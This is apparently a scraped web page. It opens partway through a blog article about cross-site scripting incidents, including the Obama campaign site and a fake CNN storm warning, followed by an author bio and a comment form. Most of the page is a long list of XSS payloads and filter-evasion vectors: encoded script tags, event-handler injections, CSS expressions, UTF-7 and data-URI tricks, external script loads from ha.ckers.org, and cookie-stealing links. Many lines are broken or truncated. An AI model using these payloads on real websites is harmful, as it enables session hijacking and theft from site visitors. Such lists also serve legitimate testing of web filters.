the attacker can harvest cookies from other visitors. Source. xssed.com
Source: ttp://xssed.com/news/65/Barack_Obamas_official_site_hacked/.
A hacker named Mox confessed in Obama’s community boards that he was the one
who had executed the exploit. He said that the scripts accepting HTML did not sanitize
the characters ” and >, thus he was able to inject javascript into the page. Any
subsequent visitors would then run the payload and be redirected to Hilary Clinton’s
page.
CNN Forecasts false tornado warning in Florida
A couple of years ago there was a link to CNN about a hurricane warning that went
viral in a very short time. The link contained information about an incoming hurricane
This type of XSS is what we call non-persistent XSS and will be explained further
down in the article. The link itself contained the payload in one of the parameters, but
people did not recognize as the site they arrived at was CNN and the story seemed like
This type of “prank” could cause numerous effects, probably not intentional. To list a
few:
Hysteria / panic
Increased sales of emergency ration
Closed business deals
Cancellation of travel tickets
… Do feel free to leave a comment if you can come up with more side effects.
http://security.stackexchange.com/a/1373/294.[/important]
Chris Dale
I'm Chris Dale from Norway, founder and principal consultant at River Security
(https://riversecurity.eu/). Along with my security expertise, I have a background from
system development and application management. Having a vast and broad experience
in IT certainly help a great deal when working penetration tests and incidents.
I am an open, sharing and engaging person to be around, some even think I'm funny. I
am usually enthusiastic and motivating when I work, and usually positive and
optimistic about the general problems I encounter. I am passionate about security, both
IT and physical security, which is one of the reasons I do a lot of public speaking at
different events such as classes, conferences and workshops.
Driven by mottos such as "Magic is just science we don't understand yet" and "Think
bad, do good", I attack today's security challenges with eagerness and enthusiasm. I
consider myself a pragmatic person, with the ability to think outside the box, keeping
the business in focus.
http://www.securesolutions.no
Post navigation
Ways to retrieve a missing persons account passwords
Leave a Reply
Your email address will not be published. Required fields are marked *
Comment
Name *
Email *
Website
Post Comme nt
Related Posts
List -->
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
onResize>
onPropertyChange="javascript:javascript:alert(1)"></title
onPropertyChange>
onLoad>
onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
onFocus>
onScroll="javascript:javascript:alert(1)"></frameset onScroll>
onReadyStateChange="javascript:javascript:alert(1)"></script
onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html
onMouseUp>
onPropertyChange="javascript:javascript:alert(1)"></body
onPropertyChange>
onPageHide>
onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
onUnload>
onPropertyChange="javascript:javascript:alert(1)"></bgsound
onPropertyChange>
onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
onLoad>
onReadyStateChange="javascript:javascript:alert(1)"></iframe
onReadyStateChange>
onPageShow>
onReadyStateChange="javascript:javascript:alert(1)"></style
onReadyStateChange>
<frameset onFocus frameset
onFocus="javascript:javascript:alert(1)"></frameset onFocus>
onError>
onStart="javascript:javascript:alert(1)"></marquee onStart>
onLoad>
onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
onMouseEnter="javascript:parent.javascript:alert(1)"></html
onMouseEnter>
onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
onScroll="javascript:javascript:alert(1)"></marquee onScroll>
onPropertyChange="javascript:javascript:alert(1)"></xml
onPropertyChange>
onBlur="javascript:javascript:alert(1)"></frameset onBlur>
onReadyStateChange="javascript:javascript:alert(1)"></applet
onReadyStateChange>
onUnload>
onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
onResize>
onError>
onPopState>
onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
onreadystatechange="javascript:javascript:alert(1)"></applet
onreadystatechange>
onpagehide>
onunload>
onerror>
onkeyup>
onunload>
onload>
onmouseover="javascript:javascript:alert(1)"></html onmouseover>
onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
onfocus>
onkeydown>
onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
onmousemove="javascript:javascript:alert(1)"></html onmousemove>
\x3Cscript>javascript:alert(1)</script>
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<script charset="\x22>javascript:alert(1)</script>
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
<style></style\x3E<img src="about:blank"
onerror=javascript:alert(1)//></style>
<style></style\x0D<img src="about:blank"
onerror=javascript:alert(1)//></style>
<style></style\x09<img src="about:blank"
onerror=javascript:alert(1)//></style>
<style></style\x20<img src="about:blank"
onerror=javascript:alert(1)//></style>
<style></style\x0A<img src="about:blank"
onerror=javascript:alert(1)//></style>
"'`>ABC<div style="font-family:'foo'\
x7Dx:expression(javascript:alert(1);/*';">DEF
"'`>ABC<div style="font-family:'foo'\
x3Bx:expression(javascript:alert(1);/*';">DEF
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<script src="data:text/plain\x2Cjavascript:alert(1)"></script>
<script src="data:\xD4\x8F,javascript:alert(1)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
<script src="data:\xCB\x8F,javascript:alert(1)"></script>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
<a href="\xC2\xA0javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)"
id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)"
id="fuzzelement1">test</a>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
<script\x2F>javascript:alert(1)</script>
<script\x20>javascript:alert(1)</script>
<script\x0D>javascript:alert(1)</script>
<script\x0A>javascript:alert(1)</script>
<script\x0C>javascript:alert(1)</script>
<script\x00>javascript:alert(1)</script>
<script\x09>javascript:alert(1)</script>
<script>javascript:alert(1)<\x00/script>
<video poster=javascript:javascript:alert(1)//
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br>
<br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<b
r><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br
><br><br>...<br><br><br><br><input autofocus>
form=test onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<maction actiontype="statusline#http://google.com"
xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden
onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a
href="/. /,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document
EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM
NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<div id="div2"></div><script>document.getElementById("div2").innerHTML =
document.getElementById("div1").innerHTML;</script>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<! foo="[[[Inception]]"><x
foo="]foo><script>javascript:alert(1)</script>">
<script>d.innerHTML=d.innerHTML</script>
<img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
<img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<a
href=javascript:javascript:alert(1)>XXX<
/a>
onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script -->
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<object id="x"
classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object
classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param
name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-
source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-
link-source:current}]{color:red};</style>
<a style="pointer-events:none;position:absolute;"><a
style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a
href="javascript:javascript:alert(1)">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo ;color:red;';">XXX
<div style="font-family:foo}color=red;">XXX
<// style=x:expression\28javascript:alert(1)\29>
<style>*{x:expression(javascript:alert(1))}</style>
<div style=content:url(%(svg)s)></div>
<div style="list-style:url(http://foo.f)\
20url(javascript:javascript:alert(1));">X
color\3Ared\3B'">X</div></div>
<script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
<div
style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/
foo.jpg);">X
#y];color:red;{} </style>
<x style="background:url('x;color:red;/*')">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</
script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function()
{javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}]
[0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-
utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8Acg
A9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-
utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
1<set/xmlns=`urn:schemas-microsoft-com:time`
style=`behAvior:url(#default#time2)` attributename=`innerhtml`
to=`<img/src="x"onerror=javascript:alert(1)>`>
1<animate/xmlns=urn:schemas-microsoft-com:time
style=behavior:url(#default#time2) attributename=innerhtml
values=<img/src="."onerror=javascript:alert(1)>>
<vmlframe xmlns=urn:schemas-microsoft-com:vml
style=behavior:url(#default#vml);position:absolute;width:100%;height:100
% src=%(vml)s#xss></vmlframe>
style=behavior:url(#default#vml);position:absolute
href=javascript:javascript:alert(1) strokecolor=white
<a style="behavior:url(#default#AnchorClick);"
folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
datasrc="#xss" datafld="payload"></label>
<a href="javascript:javascript:alert(1)"><event-source
src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
targetElement="x"
to="<imgsrc=x:xonerror=javascript:alert(1)>">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script>javascript:alert(1)</script>
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?<B>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC="javascript:javascript:alert(1)"
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
<BGSOUND SRC="javascript:javascript:alert(1);">
<BR SIZE="&{javascript:alert(1)}">
<LAYER SRC="%(scriptlet)s"></LAYER>
<STYLE>@import'%(css)s';</STYLE>
<STYLE>li {list-style-image:
url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:javascript:alert(1);">
URL=http://;URL=javascript:javascript:alert(1);">
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
<DIV STYLE="width:expression(javascript:alert(1));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<XSS STYLE="xss:expression(javascript:alert(1))">
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</
STYLE><A CLASS=XSS></A>
<STYLE
type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</
STYLE>
<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:javascript:alert(1)></OBJECT>
(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML
ID="xss"><I><B><IMG SRC="javas<!-- --
>cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss"
DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
attributeName="innerHTML" to="XSS<SCRIPT
DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
formaction="javascript:javascript:alert(1)">X
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br
><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br
><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
onEnd="javascript:alert(1)">
<STYLE>@import'%(css)s';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import
javascript:javascript:alert(1);');}</STYLE>
utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(
1);</html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
[CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href="javAascript:javascript:alert(1)">test1</a>
<a href="javaascript:javascript:alert(1)">test1</a>
code="data:text/html,<script>%(payload)s</script>"></embed>
<iframe
srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;on
error=javascript:alert(1)&gt;>">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,8
3,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,
83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG onmouseover="alert('xxs')">
<IMG
SRC=javascript:a&
#108;ert('XSS')>
<IMG
SRC=javascr�
0105pt:aler�
0116('XSS')>
<IMG
SRC=javascript:al&#x
65rt('XSS')>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image:
url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</
STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
¼script¾alert(¢XSS¢)¼/script¾
base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet"
DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-
7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<iframe src="	javascript:prompt(1)	">
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<script/	 src='https://dl.dropbox.com/u/13018058/js.js'
/	></script>
<iframe/src="data:text/
html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
equiv="refresh"/>
<svg><script
xlink:href=data:,window.open('https://www.google.com/')></script
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*/src="worksinchrome:prompt(1)"/*/
onerror='eval(src)'>
<form><iframe 	 
src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-
cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"�
onmouseover=prompt(1)//">XYZ</a
<style/onload=prompt('XSS')
  :-(
u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\
u1450')/***/</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)"
onmouseover=
javascript:alert(1)
>X</a>
<style/onload=<!--	> alert (1)>
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe// src=javaSCRIPT:alert(1)
//<form/
action=javascript:alert(document.cookie)><input/
type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1)
/*iframe/src*/>
</script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</
font>/</style>
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script
'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed
src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<object
data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<a href=javascript:alert(document.cookie)>Click
Here</a>
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
